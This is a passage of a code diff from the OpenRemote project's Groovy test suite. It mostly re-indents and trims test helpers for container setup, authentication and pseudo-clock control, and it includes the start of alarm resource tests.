+          String username,
+          String password) {
 
-    Container getContainer() {
-        return TestFixture.container
-    }
+    String scheme = secure ? "https" : "http"
+    String basePath = "/auth"
+    String baseUrl = "${scheme}://${host}${basePath}"
+    ResteasyWebTarget target = new WebTargetBuilder(WebTargetBuilder.getClient(), URI.create(baseUrl)).build()
+    TokenService keycloak = target.proxy(TokenService)
 
-    int getServerPort() {
-        if (container != null) {
-            return MapAccess.getInteger(container.getConfig(), OR_WEBSERVER_LISTEN_PORT, 0)
-        }
-        return 0
-    }
-
-    boolean isContainerRunning() {
-        container.running
-    }
-
-    ResteasyClient createClient(String accessToken) {
-        testClient.updateAndGet {it != null ? it :
-                // Use a long timeout to make debugging a bit easier
-                WebTargetBuilder.createClient(Container.EXECUTOR, 1, 120000, null)}
-    }
-
-    UriBuilder serverUri(int serverPort) {
-        UriBuilder.fromUri("")
-                .scheme("http").host("127.0.0.1").port(serverPort)
-    }
-
-    UriBuilder serverUri(boolean secure, String serverHost, int serverPort) {
-        UriBuilder.fromUri("")
-                .scheme(secure ? "https" : "http").host(serverHost).port(serverPort)
-    }
-
-    void stopContainer() {
-        try {
-            if (container != null) {
-                container.stop()
-            }
-        } catch (Exception e) {
-            LOG.warn("Failed to stop container", e)
-        } finally {
-            TestFixture.container = null
-            closeTestClient(testClient, "test JAX-RS client")
-            // Clear out the Built in JAX-RS client as the executor service it uses will be aggressively shutdown by Camel
-            closeTestClient(WebTargetBuilder.BUILT_IN_CLIENT, "built in JAX-RS client")
-        }
-    }
-
-    void closeTestClient(AtomicReference<ResteasyClient> clientReference, String clientName) {
-        try {
-            clientReference.getAndUpdate {
-                if (it != null) {
-                    it.close()
-                }
-                return null
-            }
-        } catch (Exception e) {
-            LOG.warn("Failed to close ${clientName}", e)
-        }
-    }
-
-    ResteasyWebTarget getClientTarget(UriBuilder serverUri, String accessToken) {
-        def target = createClient(accessToken).target(serverUri)
-        if (accessToken != null) {
-            ClientRequestFilter authFilter = {context ->
-                (context as ClientRequestContext).getHeaders().putSingle(HttpHeaders.AUTHORIZATION, RequestParams.BEARER_AUTH_PREFIX + accessToken)
-            }
-            target.register(authFilter)
-        }
-        return target
-    }
-
-    ResteasyWebTarget getClientApiTarget(UriBuilder serverUri, String realm) {
-        getClientTarget(serverUri.clone().replacePath(ManagerWebService.API_PATH).path(realm), null)
-    }
-
-    ResteasyWebTarget getClientApiTarget(UriBuilder serverUri, String realm, String accessToken) {
-        getClientTarget(serverUri.clone().replacePath(ManagerWebService.API_PATH).path(realm), accessToken)
-    }
-
-    ResteasyWebTarget getClientApiTarget(UriBuilder serverUri, String realm, String path, String accessToken) {
-        getClientTarget(serverUri.clone().replacePath(ManagerWebService.API_PATH).path(realm).path(path), null)
-    }
-
-    int findEphemeralPort() {
-        ServerSocket socket = new ServerSocket(0, 0, Inet4Address.getLoopbackAddress())
-        socket.close()
-        int port = socket.getLocalPort()
-        return port
-    }
-
-    String authenticate(Container container, String realm, String clientId, String username, String password) {
-        container.getService(WebService.class).getBearerToken(
-                new OAuthPasswordGrant(
-                        ((KeycloakIdentityProvider)container.getService(ManagerIdentityService.class).getIdentityProvider()).getTokenUri(realm).toString(),
-                        clientId,
-                        null,
-                        null,
-                        username,
-                        password)).get(10, TimeUnit.SECONDS)
-    }
-
-    String authenticate(Container container, String realm, String clientId, String clientSecret) {
-        container.getService(WebService.class).getBearerToken(
-                new OAuthClientCredentialsGrant(
-                        ((KeycloakIdentityProvider)container.getService(ManagerIdentityService.class).getIdentityProvider()).getTokenUri(realm).toString(),
-                        clientId,
-                        clientSecret,
-                        null)).get(10, TimeUnit.SECONDS)
-    }
-
-    /**
-     * Makes a call to a remote OpenRemote manager to retrieve an access token for a given user
-     * */
-    String authenticate(boolean secure,
-                                     String host,
-                                     String realm,
-                                     String clientId,
-                                     String username,
-                                     String password) {
-
-        String scheme   = secure ? "https" : "http"
-        String basePath = "/auth"
-        String baseUrl  = "${scheme}://${host}${basePath}"
-        ResteasyWebTarget target = new WebTargetBuilder(WebTargetBuilder.getClient(), URI.create(baseUrl)).build()
-        TokenService keycloak = target.proxy(TokenService)
-
-        return keycloak.grantToken(
+    return keycloak.grantToken(
             realm,
             new OAuthPasswordGrant(null, clientId, null, null, username, password)
-                    .asMultivaluedMap()).token
-    }
+            .asMultivaluedMap()).token
+  }
 
-    ProducerTemplate getMessageProducerTemplate(Container container) {
-        return container.getService(MessageBrokerService.class).getContext().createProducerTemplate()
-    }
+  ProducerTemplate getMessageProducerTemplate(Container container) {
+    return container.getService(MessageBrokerService.class).getContext().createProducerTemplate()
+  }
 }

--- a/test/src/main/groovy/org/openremote/test/ManagerContainerTrait.groovy
+++ b/test/src/main/groovy/org/openremote/test/ManagerContainerTrait.groovy
@@ -44,85 +44,85 @@ import static org.openremote.manager.rules.RulesService.OR_RULES_QUICK_FIRE_MILL
 
 trait ManagerContainerTrait extends ContainerTrait {
 
-    Map<String, String> defaultConfig(Integer serverPort) {
-        if (serverPort == null) {
-            serverPort = findEphemeralPort()
-        }
-        def config = [
-                (OR_WEBSERVER_LISTEN_PORT): Integer.toString(serverPort),
-                (MQTT_SERVER_LISTEN_HOST) : "127.0.0.1", // Works best for cross platform test running,
-                (MQTTBrokerService.MQTT_FORCE_USER_DISCONNECT_DEBOUNCE_MILLIS): "10",
-                (OR_RULES_QUICK_FIRE_MILLIS): "500",
-                (OR_RULES_MIN_TEMP_FACT_EXPIRATION_MILLIS): "500",
-                (TIMER_CLOCK_TYPE)        : PSEUDO.name()
-        ] << System.getenv()
-
-        config.values().removeIf { TextUtil.isNullOrEmpty(it)}
-        return config
+  Map<String, String> defaultConfig(Integer serverPort) {
+    if (serverPort == null) {
+      serverPort = findEphemeralPort()
     }
+    def config = [
+      (OR_WEBSERVER_LISTEN_PORT): Integer.toString(serverPort),
+      (MQTT_SERVER_LISTEN_HOST) : "127.0.0.1", // Works best for cross platform test running,
+      (MQTTBrokerService.MQTT_FORCE_USER_DISCONNECT_DEBOUNCE_MILLIS): "10",
+      (OR_RULES_QUICK_FIRE_MILLIS): "500",
+      (OR_RULES_MIN_TEMP_FACT_EXPIRATION_MILLIS): "500",
+      (TIMER_CLOCK_TYPE) : PSEUDO.name()
+    ] << System.getenv()
 
-    Iterable<ContainerService> defaultServices(Iterable<ContainerService> additionalServices) {
-        [
-            *Lists.newArrayList(ServiceLoader.load(ContainerService.class)),
-            *additionalServices
-        ].stream()
-            .sorted(Comparator.comparingInt{it.getPriority()})
-            .collect(Collectors.<ContainerService>toList()) as Iterable<ContainerService>
-    }
+    config.values().removeIf { TextUtil.isNullOrEmpty(it)}
+    return config
+  }
 
-    Iterable<ContainerService> defaultServices(ContainerService... additionalServices) {
-        defaultServices(Arrays.asList(additionalServices))
-    }
+  Iterable<ContainerService> defaultServices(Iterable<ContainerService> additionalServices) {
+    [
+      *Lists.newArrayList(ServiceLoader.load(ContainerService.class)),
+      *additionalServices
+    ].stream()
+    .sorted(Comparator.comparingInt{it.getPriority()})
+    .collect(Collectors.<ContainerService>toList()) as Iterable<ContainerService>
+  }
 
-    /**
-     * Execute pseudo clock operations in Container.
-     */
-    void withClockOf(Container container, Closure<TimerService.Clock> clockConsumer) {
-        clockConsumer.call(container.getService(TimerService.class).getClock())
-    }
+  Iterable<ContainerService> defaultServices(ContainerService... additionalServices) {
+    defaultServices(Arrays.asList(additionalServices))
+  }
 
-    long getClockTimeOf(Container container) {
-        container.getService(TimerService.class).getCurrentTimeMillis()
-    }
+  /**
+   * Execute pseudo clock operations in Container.
+   */
+  void withClockOf(Container container, Closure<TimerService.Clock> clockConsumer) {
+    clockConsumer.call(container.getService(TimerService.class).getClock())
+  }
 
-    Instant getInstantTimeOf(Container container) {
-        container.getService(TimerService.class).getNow()
-    }
+  long getClockTimeOf(Container container) {
+    container.getService(TimerService.class).getCurrentTimeMillis()
+  }
 
-    void advancePseudoClock(long amount, TimeUnit unit) {
-        advancePseudoClock(amount, unit, container)
-    }
+  Instant getInstantTimeOf(Container container) {
+    container.getService(TimerService.class).getNow()
+  }
 
-    void advancePseudoClock(long amount, TimeUnit unit, Container container) {
-        withClockOf(container) { it.advanceTime(amount, unit) }
-    }
+  void advancePseudoClock(long amount, TimeUnit unit) {
+    advancePseudoClock(amount, unit, container)
+  }
 
-    // Used in custom project tests
-    void setPseudoClock(LocalDate date, LocalTime time, ZoneId zoneId) {
-        withClockOf(container) { it.setTime(date, time, zoneId) }
-    }
+  void advancePseudoClock(long amount, TimeUnit unit, Container container) {
+    withClockOf(container) { it.advanceTime(amount, unit) }
+  }
 
-    void setPseudoClock(String iso8601Timestamp) {
-        withClockOf(container) { it.setTime(iso8601Timestamp) }
-    }
+  // Used in custom project tests
+  void setPseudoClock(LocalDate date, LocalTime time, ZoneId zoneId) {
+    withClockOf(container) { it.setTime(date, time, zoneId) }
+  }
 
-    void stopPseudoClock() {
-        withClockOf(container) { it.stop() }
-    }
+  void setPseudoClock(String iso8601Timestamp) {
+    withClockOf(container) { it.setTime(iso8601Timestamp) }
+  }
 
-    void startPseudoClock() {
-        withClockOf(container) { it.start() }
-    }
+  void stopPseudoClock() {
+    withClockOf(container) { it.stop() }
+  }
 
-    void noPendingExchangesOnMessageEndpoint(Container container, String... endpointName) {
-        for (String name : endpointName) {
-            def endpoint = container.getService(MessageBrokerService.class).getContext().getEndpoint(name)
-            if (!endpoint) {
-                throw new IllegalArgumentException("Messaging endpoint not found: " + name)
-            }
-            new PollingConditions(initialDelay: 0.1, delay: 0.05).eventually {
-                assert ((BrowsableEndpoint)endpoint).exchanges.size() == 0
-            }
-        }
+  void startPseudoClock() {
+    withClockOf(container) { it.start() }
+  }
+
+  void noPendingExchangesOnMessageEndpoint(Container container, String... endpointName) {
+    for (String name : endpointName) {
+      def endpoint = container.getService(MessageBrokerService.class).getContext().getEndpoint(name)
+      if (!endpoint) {
+        throw new IllegalArgumentException("Messaging endpoint not found: " + name)
+      }
+      new PollingConditions(initialDelay: 0.1, delay: 0.05).eventually {
+        assert ((BrowsableEndpoint)endpoint).exchanges.size() == 0
+      }
     }
+  }
 }

--- a/test/src/main/groovy/org/openremote/test/TestUtil.groovy
+++ b/test/src/main/groovy/org/openremote/test/TestUtil.groovy
@@ -20,82 +20,81 @@ package org.openremote.test
 
 class TestUtil {
 
-    static class TaskExecution {
-        def message = "Task"
-        def count = 1
-        def threadsPerInterval = 1
-        Closure task
+  static class TaskExecution {
+    def message = "Task"
+    def count = 1
+    def threadsPerInterval = 1
+    Closure task
 
-        @Override
-        String toString() {
-            return "\"message\": \"" + message + "\"" +
-                    ", \"count\": " + count +
-                    ", \"threadsPerInterval\": " + threadsPerInterval
-        }
+    @Override
+    String toString() {
+      return "\"message\": \"" + message + "\"" +
+              ", \"count\": " + count +
+              ", \"threadsPerInterval\": " + threadsPerInterval
     }
+  }
 
-    static class TaskReport {
-        def execution
-        def startTimestamp
-        def endTimestamp
-        def averageMillis
-        def totalMillis
-        def ops
-        def errorCount = 0
-        def lastError
+  static class TaskReport {
+    def execution
+    def startTimestamp
+    def endTimestamp
+    def averageMillis
+    def totalMillis
+    def ops
+    def errorCount = 0
+    def lastError
 
-        @Override
-        String toString() {
-            return "{" + execution +
-                    ", \"startTimestamp\":" + startTimestamp +
-                    ", \"endTimestamp\":" + endTimestamp +
-                    ", \"averageMillis\":" + averageMillis +
-                    ", \"totalMillis\": " + totalMillis +
-                    ", \"ops\": " + ops+
-                    (errorCount > 0 ? ", \"errorCount\": " + errorCount : "") +
-                    (lastError != null ? ", \"lastError\": \"" + lastError + "\"" : "") +
-                    "}"
-        }
+    @Override
+    String toString() {
+      return "{" + execution +
+              ", \"startTimestamp\":" + startTimestamp +
+              ", \"endTimestamp\":" + endTimestamp +
+              ", \"averageMillis\":" + averageMillis +
+              ", \"totalMillis\": " + totalMillis +
+              ", \"ops\": " + ops+
+              (errorCount> 0 ? ", \"errorCount\": " + errorCount : "") +
+              (lastError != null ? ", \"lastError\": \"" + lastError + "\"" : "") +
+              "}"
     }
+  }
 
-    /**
-     * <code>
-     * TaskReport report = performTimed(
-     *     new TaskExecution(message: "MyLoadTestingTask", count: 1000, task: { ... })
-     * )
-     * </code>
-     */
-    static Closure<TaskReport> performTimed = { TaskExecution taskExecution ->
-        def report = new TaskReport(execution: taskExecution)
-        report.startTimestamp = System.currentTimeMillis()
-        taskExecution.count.times {
-            def threads = []
-            taskExecution.threadsPerInterval.times {
-                threads << new Thread(new Runnable() {
-                    @Override
-                    void run() {
-                        try {
-                            taskExecution.task()
-                        } catch (Throwable t) {
+  /**
+   * <code>
+   * TaskReport report = performTimed(
+   *     new TaskExecution(message: "MyLoadTestingTask", count: 1000, task: { ... })
+   * )
+   * </code>
+   */
+  static Closure<TaskReport> performTimed = { TaskExecution taskExecution ->
+    def report = new TaskReport(execution: taskExecution)
+    report.startTimestamp = System.currentTimeMillis()
+    taskExecution.count.times {
+      def threads = []
+      taskExecution.threadsPerInterval.times {
+        threads << new Thread(new Runnable() {
+          @Override
+          void run() {
+            try {
+              taskExecution.task()
+            } catch (Throwable t) {
 
-                            report.lastError = t
-                            report.errorCount++
-                        }
-                    }
-                })
+              report.lastError = t
+              report.errorCount++
             }
-            threads*.start()
-            threads*.join()
-        }
-        report.endTimestamp = System.currentTimeMillis()
-        report.totalMillis = report.endTimestamp - report.startTimestamp
-        report.averageMillis = report.totalMillis / taskExecution.count
-        report.ops = 1000 / report.averageMillis
-        return report
+          }
+        })
+      }
+      threads*.start()
+      threads*.join()
     }
+    report.endTimestamp = System.currentTimeMillis()
+    report.totalMillis = report.endTimestamp - report.startTimestamp
+    report.averageMillis = report.totalMillis / taskExecution.count
+    report.ops = 1000 / report.averageMillis
+    return report
+  }
 
-    static void main(String[] args) {
-        performTimed
-    }
-
+  static void main(String[] args) {
+    performTimed
+  }
 }

--- a/test/src/test/groovy/org/openremote/manager/datapoint/AssetDatapointQueryDeserializationTest.groovy
+++ b/test/src/test/groovy/org/openremote/manager/datapoint/AssetDatapointQueryDeserializationTest.groovy
@@ -29,9 +29,9 @@ import java.time.ZoneId
 
 class AssetDatapointQueryDeserializationTest extends Specification {
 
-    def "AssetDatapointQuery deserializes fromTime without timezone as LocalDateTime"() {
-        given:
-        def json = '''
+  def "AssetDatapointQuery deserializes fromTime without timezone as LocalDateTime"() {
+    given:
+    def json = '''
             {
               "type": "all",
               "fromTime": "2026-02-12T00:00:00.000",
@@ -39,18 +39,18 @@ class AssetDatapointQueryDeserializationTest extends Specification {
             }
         '''
 
-        when:
-        AssetDatapointQuery query = ValueUtil.JSON.readValue(json, AssetDatapointQuery.class)
+    when:
+    AssetDatapointQuery query = ValueUtil.JSON.readValue(json, AssetDatapointQuery.class)
 
-        then:
-        query instanceof AssetDatapointAllQuery
-        query.fromTime == LocalDateTime.of(2026, 2, 12, 0, 0, 0, 0)
-        query.toTime == LocalDateTime.of(2026, 2, 12, 1, 0, 0, 0)
-    }
+    then:
+    query instanceof AssetDatapointAllQuery
+    query.fromTime == LocalDateTime.of(2026, 2, 12, 0, 0, 0, 0)
+    query.toTime == LocalDateTime.of(2026, 2, 12, 1, 0, 0, 0)
+  }
 
-    def "AssetDatapointQuery deserializes fromTime with Z and converts to server timezone"() {
-        given:
-        def json = '''
+  def "AssetDatapointQuery deserializes fromTime with Z and converts to server timezone"() {
+    given:
+    def json = '''
             {
               "type": "all",
               "fromTime": "2026-02-12T00:00:00.000Z",
@@ -58,22 +58,22 @@ class AssetDatapointQueryDeserializationTest extends Specification {
             }
         '''
 
-        when:
-        AssetDatapointQuery query = ValueUtil.JSON.readValue(json, AssetDatapointQuery.class)
+    when:
+    AssetDatapointQuery query = ValueUtil.JSON.readValue(json, AssetDatapointQuery.class)
 
-        then:
-        query instanceof AssetDatapointAllQuery
-        query.fromTime == OffsetDateTime.parse("2026-02-12T00:00:00.000Z")
+    then:
+    query instanceof AssetDatapointAllQuery
+    query.fromTime == OffsetDateTime.parse("2026-02-12T00:00:00.000Z")
             .atZoneSameInstant(ZoneId.systemDefault())
             .toLocalDateTime()
-        query.toTime == OffsetDateTime.parse("2026-02-12T01:00:00.000Z")
+    query.toTime == OffsetDateTime.parse("2026-02-12T01:00:00.000Z")
             .atZoneSameInstant(ZoneId.systemDefault())
             .toLocalDateTime()
-    }
+  }
 
-    def "AssetDatapointQuery deserializes fromTime with explicit numeric offset and converts to server timezone"() {
-        given:
-        def json = '''
+  def "AssetDatapointQuery deserializes fromTime with explicit numeric offset and converts to server timezone"() {
+    given:
+    def json = '''
             {
               "type": "all",
               "fromTime": "2026-02-12T00:00:00.000+02:00",
@@ -81,16 +81,16 @@ class AssetDatapointQueryDeserializationTest extends Specification {
             }
         '''
 
-        when:
-        AssetDatapointQuery query = ValueUtil.JSON.readValue(json, AssetDatapointQuery.class)
+    when:
+    AssetDatapointQuery query = ValueUtil.JSON.readValue(json, AssetDatapointQuery.class)
 
-        then:
-        query instanceof AssetDatapointAllQuery
-        query.fromTime == OffsetDateTime.parse("2026-02-12T00:00:00.000+02:00")
+    then:
+    query instanceof AssetDatapointAllQuery
+    query.fromTime == OffsetDateTime.parse("2026-02-12T00:00:00.000+02:00")
             .atZoneSameInstant(ZoneId.systemDefault())
             .toLocalDateTime()
-        query.toTime == OffsetDateTime.parse("2026-02-12T01:00:00.000+02:00")
+    query.toTime == OffsetDateTime.parse("2026-02-12T01:00:00.000+02:00")
             .atZoneSameInstant(ZoneId.systemDefault())
             .toLocalDateTime()
-    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/alarm/AlarmResourceTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/alarm/AlarmResourceTest.groovy
@@ -53,827 +53,827 @@ import jakarta.ws.rs.WebApplicationException
 import static org.openremote.model.Constants.SUPER_USER_REALM_ROLE
 
 class AlarmResourceTest extends Specification implements ManagerContainerTrait {
-    @Shared
-    static AlarmResource adminResource
+  @Shared
+  static AlarmResource adminResource
 
-    @Shared
-    static AlarmResource superAdminResource
+  @Shared
+  static AlarmResource superAdminResource
 
-    @Shared
-    static AlarmResource regularUserResource
+  @Shared
+  static AlarmResource regularUserResource
 
-    @Shared
-    static AlarmResource buildingUserResource
+  @Shared
+  static AlarmResource buildingUserResource
 
-    @Shared
-    static KeycloakTestSetup keycloakTestSetup
+  @Shared
+  static KeycloakTestSetup keycloakTestSetup
 
-    @Shared
-    static ManagerTestSetup managerTestSetup
+  @Shared
+  static ManagerTestSetup managerTestSetup
 
-    @Shared
-    static String alarmsReadWriteUserId
+  @Shared
+  static String alarmsReadWriteUserId
 
-    @Shared
-    static String testuser4Id
+  @Shared
+  static String testuser4Id
 
-    @Shared
-    static NotificationService notificationService
+  @Shared
+  static NotificationService notificationService
 
-    @Shared
-    static List<AbstractNotificationMessage> notificationMessages = new CopyOnWriteArrayList<>()
+  @Shared
+  static List<AbstractNotificationMessage> notificationMessages = new CopyOnWriteArrayList<>()
 
-    def setupSpec() {
-        def container = startContainer(defaultConfig(), defaultServices())
-        keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        notificationService = container.getService(NotificationService.class)
+  def setupSpec() {
+    def container = startContainer(defaultConfig(), defaultServices())
+    keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    notificationService = container.getService(NotificationService.class)
 
-        def adminAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                MASTER_REALM_ADMIN_USER,
-                getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
-        )
+    def adminAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
 
-        regularUserResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AlarmResource.class)
-        adminResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(AlarmResource.class)
+    regularUserResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM).proxy(AlarmResource.class)
+    adminResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, adminAccessToken).proxy(AlarmResource.class)
 
-        User alarmsReadWriteUser = keycloakTestSetup.createUser(MASTER_REALM, "alarmsrwuser1", "alarmsrwuser1", "Alarms R/W", "User", "alarmsrwuser@openremote.local", true, KeycloakTestSetup.REGULAR_USER_ROLES)
-        alarmsReadWriteUserId = alarmsReadWriteUser.getId();
+    User alarmsReadWriteUser = keycloakTestSetup.createUser(MASTER_REALM, "alarmsrwuser1", "alarmsrwuser1", "Alarms R/W", "User", "alarmsrwuser@openremote.local", true, KeycloakTestSetup.REGULAR_USER_ROLES)
+    alarmsReadWriteUserId = alarmsReadWriteUser.getId()
 
-        User superUser = keycloakTestSetup.createUser(MASTER_REALM, "testuser4", "testuser4", "Demo4", "Demo4", null, true, new ClientRole[] {ClientRole.WRITE, ClientRole.READ});
-        testuser4Id = superUser.getId();
-        keycloakTestSetup.keycloakProvider.updateUserClientRoles(MASTER_REALM, testuser4Id, "account");
-        keycloakTestSetup.keycloakProvider.updateUserRealmRoles(MASTER_REALM, testuser4Id, keycloakTestSetup.keycloakProvider.addUserRealmRoles(MASTER_REALM, testuser4Id, SUPER_USER_REALM_ROLE));
+    User superUser = keycloakTestSetup.createUser(MASTER_REALM, "testuser4", "testuser4", "Demo4", "Demo4", null, true, new ClientRole[] {
+              ClientRole.WRITE, ClientRole.READ
+            })
+    testuser4Id = superUser.getId()
+    keycloakTestSetup.keycloakProvider.updateUserClientRoles(MASTER_REALM, testuser4Id, "account")
+    keycloakTestSetup.keycloakProvider.updateUserRealmRoles(MASTER_REALM, testuser4Id, keycloakTestSetup.keycloakProvider.addUserRealmRoles(MASTER_REALM, testuser4Id, SUPER_USER_REALM_ROLE))
 
-        def superAdminAccessToken = authenticate(
-                container,
-                MASTER_REALM,
-                KEYCLOAK_CLIENT_ID,
-                "testuser4",
-                "testuser4",
-        )
+    def superAdminAccessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser4",
+            "testuser4",
+            )
 
-        superAdminResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, superAdminAccessToken).proxy(AlarmResource.class)
+    superAdminResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, superAdminAccessToken).proxy(AlarmResource.class)
 
-        def buildingUserAccessToken = authenticate(
-                container,
-                keycloakTestSetup.realmBuilding.name,
-                KEYCLOAK_CLIENT_ID,
-                "testuser3",
-                "testuser3"
-        )
+    def buildingUserAccessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
 
-        buildingUserResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, buildingUserAccessToken).proxy(AlarmResource.class)
+    buildingUserResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, buildingUserAccessToken).proxy(AlarmResource.class)
 
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        def throwPushHandlerException = false
-        EmailNotificationHandler mockPushNotificationHandler = Spy(emailNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                if (throwPushHandlerException) {
-                    throw new Exception("Failed to send notification")
-                }
-                notificationMessages << message
-                callRealMethod()
-        }
-        mockPushNotificationHandler.sendMessage(_ as Message) >> {
-            message -> return NotificationSendResult.success()
-        }
-
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockPushNotificationHandler)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    def throwPushHandlerException = false
+    EmailNotificationHandler mockPushNotificationHandler = Spy(emailNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      if (throwPushHandlerException) {
+        throw new Exception("Failed to send notification")
+      }
+      notificationMessages << message
+      callRealMethod()
+    }
+    mockPushNotificationHandler.sendMessage(_ as Message) >> { message ->
+      return NotificationSendResult.success()
     }
 
-    def cleanup() {
-        // Remove all alarms
-        [MASTER_REALM, keycloakTestSetup.realmBuilding.name].each { realm ->
-            def alarms = superAdminResource.getAlarms(null, realm, null, null, null)
-            if (alarms.length > 0) {
-                superAdminResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
-            }
-        }
-
-        // Clear notifications
-        notificationMessages.clear()
-    }
-
-    // Create alarm as new super user in other realm
-    @Unroll
-    def "should create an alarm with title '#title', content '#content', severity '#severity', assigneeId '#assigneeId' and '#emailNotifications' emailNotifications as new super user in other realm"() {
-        when: "an alarm is created"
-        def input = new Alarm(title, content, severity, assigneeId, keycloakTestSetup.realmBuilding.name)
-        def alarm = superAdminResource.createAlarm(null, input, null)
-
-        then:
-        alarm != null
-        alarm.title == title
-        alarm.content == content
-        alarm.severity == severity
-        alarm.assigneeId == assigneeId
-        alarm.status == Alarm.Status.OPEN
-
-        and:
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 1, delay: 0.2)
-        conditions.eventually {
-            assert notificationMessages.size() == emailNotifications
-        }
-
-        where:
-        title                     | content                | severity        | assigneeId                    | emailNotifications
-        "Low Alarm"               | "Test Description"     | Severity.LOW    | null                          | 0
-        "Low Assigned 1 Alarm"    | "Test Description"     | Severity.LOW    | keycloakTestSetup.testuser1Id | 0
-        "Low Assigned 2 Alarm"    | "Test Description"     | Severity.LOW    | alarmsReadWriteUserId         | 0
-        "Medium Unassigned Alarm" | "Another Description"  | Severity.MEDIUM | null                          | 0
-        "Medium Assigned 1 Alarm" | "Assigned Description" | Severity.MEDIUM | keycloakTestSetup.testuser1Id | 0
-        "Medium Assigned 2 Alarm" | "Assigned Description" | Severity.MEDIUM | alarmsReadWriteUserId         | 0
-        "High Unassigned Alarm"   | "Critical Description" | Severity.HIGH   | null                          | 1
-        "High Assigned 1 Alarm"   | "Critical Description" | Severity.HIGH   | keycloakTestSetup.testuser1Id | 0
-        "High Assigned 2 Alarm"   | "Critical Description" | Severity.HIGH   | alarmsReadWriteUserId         | 1
-    }
-
-    // Create alarm as admin
-    @Unroll
-    def "should create an alarm with title '#title', content '#content', severity '#severity', assigneeId '#assigneeId' and '#emailNotifications' emailNotifications"() {
-        when: "an alarm is created"
-        def input = new Alarm(title, content, severity, assigneeId, MASTER_REALM)
-        def alarm = adminResource.createAlarm(null, input, null)
-
-        then:
-        alarm != null
-        alarm.title == title
-        alarm.content == content
-        alarm.severity == severity
-        alarm.assigneeId == assigneeId
-        alarm.status == Alarm.Status.OPEN
-
-        and:
-        def conditions = new PollingConditions(timeout: 10, initialDelay: 1, delay: 0.2)
-        conditions.eventually {
-            assert notificationMessages.size() == emailNotifications
-        }
-
-        where:
-        title                     | content                | severity        | assigneeId                    | emailNotifications
-        "Low Alarm"               | "Test Description"     | Severity.LOW    | null                          | 0
-        "Low Assigned 1 Alarm"    | "Test Description"     | Severity.LOW    | keycloakTestSetup.testuser1Id | 0
-        "Low Assigned 2 Alarm"    | "Test Description"     | Severity.LOW    | alarmsReadWriteUserId         | 0
-        "Medium Unassigned Alarm" | "Another Description"  | Severity.MEDIUM | null                          | 0
-        "Medium Assigned 1 Alarm" | "Assigned Description" | Severity.MEDIUM | keycloakTestSetup.testuser1Id | 0
-        "Medium Assigned 2 Alarm" | "Assigned Description" | Severity.MEDIUM | alarmsReadWriteUserId         | 0
-        "High Unassigned Alarm"   | "Critical Description" | Severity.HIGH   | null                          | 1
-        "High Assigned 1 Alarm"   | "Critical Description" | Severity.HIGH   | keycloakTestSetup.testuser1Id | 0
-        "High Assigned 2 Alarm"   | "Critical Description" | Severity.HIGH   | alarmsReadWriteUserId         | 1
-    }
-
-    @Unroll
-    def "should create an alarm with title '#title', content '#content', severity '#severity', and source '#source'"() {
-        when: "an alarm is created"
-        def input = new Alarm().setTitle(title).setContent(content).setSeverity(severity).setStatus(Alarm.Status.OPEN).setRealm(MASTER_REALM)
-        def alarm = adminResource.createAlarm(null, input, null)
-
-        then:
-        alarm != null
-        alarm.title == title
-        alarm.content == content
-        alarm.severity == severity
-        alarm.status == Alarm.Status.OPEN
-        alarm.source == source
-
-        where:
-        title            | content                | severity        | source
-        "Test Alarm"     | "Test Description"     | Severity.LOW    | Alarm.Source.MANUAL
-        "Another Alarm"  | "Another Description"  | Severity.MEDIUM | Alarm.Source.MANUAL
-        "Critical Alarm" | "Critical Description" | Severity.HIGH   | Alarm.Source.MANUAL
-    }
-
-    @Unroll
-    def "should not create an alarm with title '#title', content '#content', severity '#severity', and status '#status'"() {
-        when:
-        adminResource.createAlarm(null, new Alarm().setTitle(title).setContent(content).setSeverity(severity).setStatus(status).setRealm(MASTER_REALM), null)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        where:
-        title                | content               | severity     | status
-        null                 | "Test Description"    | Severity.LOW | Alarm.Status.OPEN
-        "Another Test Alarm" | "Another Description" | null         | Alarm.Status.RESOLVED
-    }
-
-    // Create alarm without write:alarm role
-    def "should not create an alarm as regular user"() {
-        when:
